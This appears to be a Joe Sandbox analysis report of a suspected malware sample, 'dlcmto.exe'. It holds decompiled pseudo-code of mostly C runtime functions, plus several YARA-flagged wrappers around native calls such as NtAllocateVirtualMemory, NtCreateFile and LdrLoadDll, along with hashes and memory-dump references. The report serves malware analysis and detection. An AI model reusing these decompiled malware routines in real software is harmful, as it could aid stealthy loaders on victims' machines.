                                          0x0119565c
                                          0x01195661
                                          0x01195663
                                          0x00000000
                                          0x01195665
                                          0x01195671
                                          0x01195675
                                          0x01195677
                                          0x0119569c
                                          0x0119569e
                                          0x011956b7
                                          0x011956be
                                          0x00000000
                                          0x011956a0
                                          0x011956a0
                                          0x011956a9
                                          0x011956ae
                                          0x00000000
                                          0x011956ae
                                          0x01195679
                                          0x01195679
                                          0x01195679
                                          0x01195682
                                          0x01195687
                                          0x01195688
                                          0x01195688
                                          0x00000000
                                          0x0119568d
                                          0x01195677
                                          0x0119563d
                                          0x01195643
                                          0x01195645
                                          0x01195647
                                          0x01195654
                                          0x00000000
                                          0x01195649
                                          0x01195649
                                          0x0119564c
                                          0x011956c6
                                          0x011956c6
                                          0x0119564e
                                          0x0119564e
                                          0x0119564e
                                          0x0119564e
                                          0x01195650
                                          0x01195650
                                          0x01195650
                                          0x0119564c
                                          0x01195647
                                          0x011956c9
                                          0x011956d1
                                          0x011956d3
                                          0x011956d3
                                          0x011956da
                                          0x011955a8
                                          0x01195618
                                          0x01195618
                                          0x0119561a
                                          0x00000000
                                          0x0119561c
                                          0x0119561f
                                          0x0119561f
                                          0x0119561a
                                          0x011955a6
                                          0x011955a1
                                          0x01195580
                                          0x01195585
                                          0x01195585

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,0119AD22,?,00000001,01196BBD,?,0119ABA6,00000001,?,?,?,01196CD1,?,?), ref: 011954D4
                                          • _free.LIBCMT ref: 01195531
                                          • _free.LIBCMT ref: 01195567
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,0119ABA6,00000001,?,?,?,01196CD1,?,?,?,011A5F70,0000002C,01196BBD), ref: 01195572
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: 1f8c6cb24ec3daa14b623df9bd11794329078476ebe732fe55286ec6b3e398ef
                                          • Instruction ID: f4b6f06b4d1189f4d4ad7d23cf5839e50f94e6069b1d722aade157db8a49c9ff
                                          • Opcode Fuzzy Hash: 1f8c6cb24ec3daa14b623df9bd11794329078476ebe732fe55286ec6b3e398ef
                                          • Instruction Fuzzy Hash: 3B110A316052026BBFAF267CAC84D2A395B9FD167DF690137F635F31C1DF21894142A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01195626 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 85%
                                          			E01195626(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x11a7230; // 0x7
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E011950C1(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E011971A3(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E011950C1(__eflags,  *0x11a7230, _t18);
							if(__eflags != 0) {
								E01195747(_t18, 0x11a9688);
								E011963FE(0);
								goto L13;
							} else {
								_t13 = 0;
								E011950C1(__eflags,  *0x11a7230, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E011950C1(0,  *0x11a7230, 0);
							_push(0);
							L9:
							E011963FE();
							goto L4;
						}
					}
				} else {
					_t18 = E01195082(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x11a7230; // 0x7
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}








                                          0x01195631
                                          0x01195633
                                          0x01195638
                                          0x0119563b
                                          0x01195659
                                          0x0119565c
                                          0x01195661
                                          0x01195663
                                          0x00000000
                                          0x01195665
                                          0x01195671
                                          0x01195675
                                          0x01195677
                                          0x0119569c
                                          0x0119569e
                                          0x011956b7
                                          0x011956be
                                          0x00000000
                                          0x011956a0
                                          0x011956a0
                                          0x011956a9
                                          0x011956ae
                                          0x00000000
                                          0x011956ae
                                          0x01195679
                                          0x01195679
                                          0x01195679
                                          0x01195682
                                          0x01195687
                                          0x01195688
                                          0x01195688
                                          0x00000000
                                          0x0119568d
                                          0x01195677
                                          0x0119563d
                                          0x01195643
                                          0x01195647
                                          0x01195654
                                          0x00000000
                                          0x01195649
                                          0x0119564c
                                          0x011956c6
                                          0x011956c6
                                          0x0119564e
                                          0x0119564e
                                          0x0119564e
                                          0x01195650
                                          0x01195650
                                          0x01195650
                                          0x0119564c
                                          0x01195647
                                          0x011956c9
                                          0x011956d1
                                          0x011956da

                                          APIs
                                          • GetLastError.KERNEL32(?,?,?,01196E44,0119BDEE,?,01198694,?,00000004,00000000,?,?,?,011934C6,?,00000000), ref: 0119562B
                                          • _free.LIBCMT ref: 01195688
                                          • _free.LIBCMT ref: 011956BE
                                          • SetLastError.KERNEL32(00000000,00000007,000000FF,?,01198694,?,00000004,00000000,?,?,?,011934C6,?,00000000,00000004), ref: 011956C9
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ErrorLast_free
                                          • String ID:
                                          • API String ID: 2283115069-0
                                          • Opcode ID: aa64fcf18080f71dc0c4cd238571ba8a388712a76496f816d06316d0d42e376e
                                          • Instruction ID: 4bc93dbcd58796c54e86ae0b9f7f29a9fba42c0f9c65125cb51fcce27f621158
                                          • Opcode Fuzzy Hash: aa64fcf18080f71dc0c4cd238571ba8a388712a76496f816d06316d0d42e376e
                                          • Instruction Fuzzy Hash: 1D11C6326152023BAFAF2578BC80E6A2A5B9BD167CF650237F234B61C0DF61884182E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0119D8D9 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0119D8D9(void* _a4, long _a8, DWORD* _a12) {
				void* _t13;

				_t13 = WriteConsoleW( *0x11a7aa0, _a4, _a8, _a12, 0);
				if(_t13 == 0 && GetLastError() == 6) {
					E0119D94D();
					E0119D92E();
					_t13 = WriteConsoleW( *0x11a7aa0, _a4, _a8, _a12, _t13);
				}
				return _t13;
			}




                                          0x0119d8f6
                                          0x0119d8fa
                                          0x0119d907
                                          0x0119d90c
                                          0x0119d927
                                          0x0119d927
                                          0x0119d92d

                                          APIs
                                          • WriteConsoleW.KERNEL32(?,?,01196BBD,00000000,?,?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001), ref: 0119D8F0
                                          • GetLastError.KERNEL32(?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001,00000000,00000001,?,0119ABCA,01196CD1), ref: 0119D8FC
                                            • Part of subcall function 0119D94D: CloseHandle.KERNEL32(FFFFFFFE,0119D90C,?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001,00000000,00000001), ref: 0119D95D
                                          • ___initconout.LIBCMT ref: 0119D90C
                                            • Part of subcall function 0119D92E: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0119D8CA,0119CEEE,00000001,?,0119B134,00000000,?,00000001,00000000), ref: 0119D941
                                          • WriteConsoleW.KERNEL32(?,?,01196BBD,00000000,?,0119CF01,?,00000001,?,00000001,?,0119B134,00000000,?,00000001,00000000), ref: 0119D921
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                          • String ID:
                                          • API String ID: 2744216297-0
                                          • Opcode ID: 7c58e969315ab9f02fc363f174329837c16e50f57e20f91b5bf61f779c447519
                                          • Instruction ID: 1b14f632a4c65b2dfba7913fec9d4cf570d7614a5a7a2d92b7dd9385f9673f27
                                          • Opcode Fuzzy Hash: 7c58e969315ab9f02fc363f174329837c16e50f57e20f91b5bf61f779c447519
                                          • Instruction Fuzzy Hash: 71F01C36505219BFCF2A2FD5EC04A9A3F67EB092A0F484020FA2985120E73289A0DB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01192AA7 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E01192AA7() {

				E011963FE( *0x11a9698);
				 *0x11a9698 = 0;
				E011963FE( *0x11a969c);
				 *0x11a969c = 0;
				E011963FE( *0x11a9044);
				 *0x11a9044 = 0;
				E011963FE( *0x11a9048);
				 *0x11a9048 = 0;
				return 1;
			}



                                          0x01192ab0
                                          0x01192abd
                                          0x01192ac3
                                          0x01192ace
                                          0x01192ad4
                                          0x01192adf
                                          0x01192ae5
                                          0x01192aed
                                          0x01192af6

                                          APIs
                                          • _free.LIBCMT ref: 01192AB0
                                            • Part of subcall function 011963FE: HeapFree.KERNEL32(00000000,00000000,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?), ref: 01196414
                                            • Part of subcall function 011963FE: GetLastError.KERNEL32(?,?,01197171,?,00000000,?,?,?,0119707C,?,00000007,?,?,011976E5,?,?), ref: 01196426
                                          • _free.LIBCMT ref: 01192AC3
                                          • _free.LIBCMT ref: 01192AD4
                                          • _free.LIBCMT ref: 01192AE5
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID: _free$ErrorFreeHeapLast
                                          • String ID:
                                          • API String ID: 776569668-0
                                          • Opcode ID: 514e92bf525e395d697a6f645367e447cddf58acf877f824b750d9e0440e921c
                                          • Instruction ID: 5e36955ffbc6bef8551d5e35adb6c96a4427a88acb228ec5ed816f653461a721
                                          • Opcode Fuzzy Hash: 514e92bf525e395d697a6f645367e447cddf58acf877f824b750d9e0440e921c
                                          • Instruction Fuzzy Hash: 70E0E67145512DBBDF3D6F14B6004C53E66EB9865C7C50035E47C56219CB3906E2DF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01193038 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 128COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 87%
                                          			E01193038(void* __edx, intOrPtr _a4) {
				signed int _v12;
				void* _v16;
				char _v20;
				char* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t26;
				intOrPtr* _t36;
				signed int _t37;
				signed int _t40;
				intOrPtr _t42;
				signed int _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr _t48;
				signed int _t49;
				signed int _t55;
				void* _t58;
				intOrPtr* _t59;
				void* _t63;
				signed int _t65;
				intOrPtr _t67;

				_t58 = __edx;
				_pop(_t68);
				_t48 = _a4;
				if(_t48 != 0) {
					_push(_t63);
					__eflags = _t48 - 2;
					if(_t48 == 2) {
						L6:
						E01195C22(_t63);
						E01197FF3(_t48, _t58, 0, 0x11a9070, 0, 0x11a9070, 0x104);
						_t26 =  *0x11a904c; // 0xf13408
						 *0x11a903c = 0x11a9070;
						_v24 = _t26;
						__eflags = _t26;
						if(_t26 == 0) {
							L8:
							_t26 = 0x11a9070;
							_v24 = 0x11a9070;
						} else {
							__eflags =  *_t26;
							if( *_t26 == 0) {
								goto L8;
							}
						}
						_v12 = 0;
						_v20 = 0;
						_t65 = E01193043(E011931C8( &_v12, _t26, 0, 0,  &_v12,  &_v20), _v12, _v20, 1);
						__eflags = _t65;
						if(__eflags != 0) {
							E011931C8( &_v12, _v24, _t65, _t65 + _v12 * 4,  &_v12,  &_v20);
							__eflags = _t48 - 1;
							if(_t48 != 1) {
								_v16 = 0;
								_push( &_v16);
								_t49 = E011977C1(_t48, _t65);
								__eflags = _t49;
								if(_t49 == 0) {
									_t59 = _v16;
									_t55 = 0;
									_t36 = _t59;
									__eflags =  *_t59;
									if( *_t59 != 0) {
										do {
											_t36 = _t36 + 4;
											_t55 = _t55 + 1;
											__eflags =  *_t36;
										} while ( *_t36 != 0);
									}
									_t37 = 0;
									 *0x11a9040 = _t55;
									_v16 = 0;
									_t49 = 0;
									 *0x11a9044 = _t59;
								} else {
									_t37 = _v16;
								}
								E011963FE(_t37);
								_v16 = 0;
							} else {
								_t42 = _v12 - 1;
								__eflags = _t42;
								 *0x11a9040 = _t42;
								_t43 = _t65;
								_t65 = 0;
								 *0x11a9044 = _t43;
								goto L13;
							}
						} else {
							_t44 = E01196E3F(__eflags);
							_push(0xc);
							_pop(0);
							 *_t44 = 0;
							L13:
							_t49 = 0;
						}
						E011963FE(_t65);
						_t40 = _t49;
					} else {
						__eflags = _t48 - 1;
						if(__eflags == 0) {
							goto L6;
						} else {
							_t45 = E01196E3F(__eflags);
							_t67 = 0x16;
							 *_t45 = _t67;
							E011964D1();
							_t40 = _t67;
						}
					}
				} else {
					_t40 = 0;
				}
				return _t40;
			}



























                                          0x01193038
                                          0x0119303d
                                          0x0119309b
                                          0x011930a0
                                          0x011930a9
                                          0x011930aa
                                          0x011930ad
                                          0x011930ca
                                          0x011930cb
                                          0x011930de
                                          0x011930e3
                                          0x011930eb
                                          0x011930f1
                                          0x011930f4
                                          0x011930f6
                                          0x011930fd
                                          0x011930fd
                                          0x011930ff
                                          0x011930f8
                                          0x011930f8
                                          0x011930fb
                                          0x00000000
                                          0x00000000
                                          0x011930fb
                                          0x01193105
                                          0x0119310c
                                          0x01193125
                                          0x0119312a
                                          0x0119312c
                                          0x0119314d
                                          0x01193155
                                          0x01193158
                                          0x01193173
                                          0x01193176
                                          0x0119317d
                                          0x01193181
                                          0x01193183
                                          0x0119318a
                                          0x0119318d
                                          0x0119318f
                                          0x01193191
                                          0x01193193
                                          0x01193195
                                          0x01193195
                                          0x01193198
                                          0x01193199
                                          0x01193199
                                          0x01193195
                                          0x0119319d
                                          0x0119319f
                                          0x011931a5
                                          0x011931a8
                                          0x011931aa
                                          0x01193185
                                          0x01193185
                                          0x01193185
                                          0x011931b1
                                          0x011931b7
                                          0x0119315a
                                          0x0119315d
                                          0x0119315d
                                          0x0119315e
                                          0x01193163
                                          0x01193165
                                          0x01193167
                                          0x00000000
                                          0x01193167
                                          0x0119312e
                                          0x0119312e
                                          0x01193133
                                          0x01193135
                                          0x01193136
                                          0x0119316c
                                          0x0119316c
                                          0x0119316c
                                          0x011931bb
                                          0x011931c1
                                          0x011930af
                                          0x011930af
                                          0x011930b2
                                          0x00000000
                                          0x011930b4
                                          0x011930b4
                                          0x011930bb
                                          0x011930bc
                                          0x011930be
                                          0x011930c3
                                          0x011930c3
                                          0x011930b2
                                          0x011930a2
                                          0x011930a2
                                          0x011930a2
                                          0x011931c7

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000001.00000002.255634635.0000000001191000.00000020.00000001.01000000.00000004.sdmp, Offset: 01190000, based on PE: true
                                          • Associated: 00000001.00000002.255620385.0000000001190000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255689187.00000000011A0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255702128.00000000011A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                          • Associated: 00000001.00000002.255717575.00000000011AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_1190000_dlcmto.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: C:\Users\user\AppData\Local\Temp\dlcmto.exe
                                          • API String ID: 0-1922560230
                                          • Opcode ID: a7293725419f60ba28ba8b6c39527844502134d47222787c53e8344a3113e78d
                                          • Instruction ID: 2742695f19ad7ae49f20edbac9ee48381a6b55a47db1b2cbc8d78b2663cca6a8
                                          • Opcode Fuzzy Hash: a7293725419f60ba28ba8b6c39527844502134d47222787c53e8344a3113e78d
                                          • Instruction Fuzzy Hash: EF41A4B1E10219ABDF2D9BADDD849AEBBBCFB95314F140076E53497250DB708A40CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Function 0041E7CD Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31memorynativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 0 41e7cd-41e810 call 41f243 NtAllocateVirtualMemory
                                          C-Code - Quality: 100%
                                          			E0041E7CD(void* _a4, PVOID* _a8, long _a12, long* _a16, long _a20, long _a24) {
				intOrPtr _v0;
				long _t14;

				_t10 = _v0;
				E0041F243( *((intOrPtr*)(_v0 + 0x14)), _t10, _t10 + 0xa8c,  *((intOrPtr*)(_v0 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a4, _a8, _a12, _a16, _a20, _a24); // executed
				return _t14;
			}





                                          0x0041e7d6
                                          0x0041e7ea
                                          0x0041e80c
                                          0x0041e810

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,?,00000004,00001000,00000000), ref: 0041E80C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID: ($
                                          • API String ID: 2167126740-1917586925
                                          • Opcode ID: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                          • Instruction ID: 75c01ba8265e86b6e799f606f6827c4ef4659bfb27b3c208fb82fe6623ca5877
                                          • Opcode Fuzzy Hash: 41196e49ac4ea828d442559080510825f434a657ed3d3ee46247645fae91569f
                                          • Instruction Fuzzy Hash: 63F015B6210208BBCB14DF89DC81EEB77ADAF88754F118159BE08A7241C630FD11CBB4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E5ED Relevance: 1.6, APIs: 1, Instructions: 70filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 176 41e5ed-41e5f1 177 41e5f3-41e644 call 41f243 NtCreateFile 176->177 178 41e5b5-41e5ec call 41f243 176->178
                                          C-Code - Quality: 60%
                                          			E0041E5ED(char __ecx, char* __edx, void* __eflags, long _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				intOrPtr* __esi;
				void* __ebp;
				void* _t35;
				intOrPtr* _t36;

				asm("out 0x1e, eax");
				 *__edx = __ecx;
				if(__eflags > 0) {
					asm("in al, dx");
					_t23 = _a8;
					_t3 = _t23 + 0xa68; // 0xa90
					_t36 = _t3;
					E0041F243(_a8[5], _t23, _t36, _a8[5], 0, 0x27);
					return  *((intOrPtr*)( *_t36))(_a12, _a16, _a20, _a24, _a28, _t35);
				} else {
					__ebp = __esp;
					__eax = _a4;
					__ecx =  *((intOrPtr*)(__eax + 0x14));
					_t11 = __eax + 0xa6c; // 0xa6c
					__esi = _t11;
					__eax = E0041F243( *((intOrPtr*)(__eax + 0x14)), __eax, __esi,  *((intOrPtr*)(__eax + 0x14)), 0, 0x28);
					__edx = _a48;
					__eax = _a44;
					__ecx = _a40;
					__edx = _a36;
					__eax = _a32;
					__ecx = _a28;
					__edx = _a24;
					__eax = _a20;
					__ecx = _a16;
					__edx = _a12;
					__eax = _a8;
					__ecx =  *__esi;
					__eax = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
					__esi = __esi;
					__ebp = __ebp;
					return __eax;
				}
			}







                                          0x0041e5ed
                                          0x0041e5ef
                                          0x0041e5f1
                                          0x0041e5b5
                                          0x0041e5b6
                                          0x0041e5c2
                                          0x0041e5c2
                                          0x0041e5ca
                                          0x0041e5ec
                                          0x0041e5f3
                                          0x0041e5f4
                                          0x0041e5f6
                                          0x0041e5f9
                                          0x0041e602
                                          0x0041e602
                                          0x0041e60a
                                          0x0041e60f
                                          0x0041e612
                                          0x0041e615
                                          0x0041e61c
                                          0x0041e620
                                          0x0041e624
                                          0x0041e628
                                          0x0041e62c
                                          0x0041e630
                                          0x0041e634
                                          0x0041e638
                                          0x0041e63c
                                          0x0041e640
                                          0x0041e642
                                          0x0041e643
                                          0x0041e644
                                          0x0041e644

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000000,?,0041935F,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,0041935F,?,00000000,00000060,00000000,00000000), ref: 0041E640
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                          • Instruction ID: bf58b033f4df4117e7473d6230dd595e805d3fddb0b0a0f6bc399e62227eb295
                                          • Opcode Fuzzy Hash: c2940defc1f95fd30518e2f85d8637610e3b44d043bb621822615bc0800cbd0f
                                          • Instruction Fuzzy Hash: C71112B2604208BFCB08DF98DC85EEB37ADEF8C754F048258BA0C97241D631E951CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040CF23 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 200 40cf23-40cf3f 201 40cf47-40cf4c 200->201 202 40cf42 call 420f13 200->202 203 40cf52-40cf60 call 421433 201->203 204 40cf4e-40cf51 201->204 202->201 207 40cf70-40cf81 call 41f7b3 203->207 208 40cf62-40cf6d call 4216b3 203->208 213 40cf83-40cf97 LdrLoadDll 207->213 214 40cf9a-40cf9d 207->214 208->207 213->214
                                          C-Code - Quality: 100%
                                          			E0040CF23(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_t24 = _a8;
				_v8 =  &_v536;
				_t15 = E00420F13( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E00421433(_v8, _t24, __eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E004216B3( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041F7B3(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040cf2c
                                          0x0040cf3f
                                          0x0040cf42
                                          0x0040cf47
                                          0x0040cf4c
                                          0x0040cf56
                                          0x0040cf5b
                                          0x0040cf5e
                                          0x0040cf60
                                          0x0040cf68
                                          0x0040cf6d
                                          0x0040cf6d
                                          0x0040cf74
                                          0x0040cf7c
                                          0x0040cf7f
                                          0x0040cf81
                                          0x0040cf95
                                          0x00000000
                                          0x0040cf97
                                          0x0040cf9d
                                          0x0040cf51
                                          0x0040cf51
                                          0x0040cf51

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040CF95
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                          • Instruction ID: 5e04f6221a37e6357fdc510ce1da2c9258563d4a4a23712c115eaecd70357e5d
                                          • Opcode Fuzzy Hash: 2d8971ab7e40216f1ab7880a6b3bd7b14f9e717b1ef25046fbf816b69d0e01bc
                                          • Instruction Fuzzy Hash: D30152B1E4010EABDF10DBA1DD82F9EB3789B54308F0042A6E908A7280F634EB448B95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E69D Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 215 41e69d-41e6a1 216 41e6a3-41e6ec call 41f243 NtReadFile 215->216 217 41e6ed-41e6ef 215->217
                                          APIs
                                          • NtReadFile.NTDLL(00419523,004149F3,FFFFFFFF,0041900D,00000002,?,00419523,00000002,0041900D,FFFFFFFF,004149F3,00419523,00000002,00000000), ref: 0041E6E8
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.297238970.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_400000_dlcmto.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                          • Instruction ID: afefd89c63c408e271d207366b207e4e6e1d150e5249734bbce09756756f7a8e
                                          • Opcode Fuzzy Hash: 32c8df3c70d67261ae50247031a770c3232371363107fb8c2be793b250d4e9c9
                                          • Instruction Fuzzy Hash: 2FF014B6200208AFCB04DF9ACC84EEB77A9EF8C754F118258BE0D97240D630E941CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0041E5F3 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 220 41e5f3-41e644 call 41f243 NtCreateFile
                                          C-Code - Quality: 100%
                                          			E0041E5F3(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xa6c; // 0xa6c
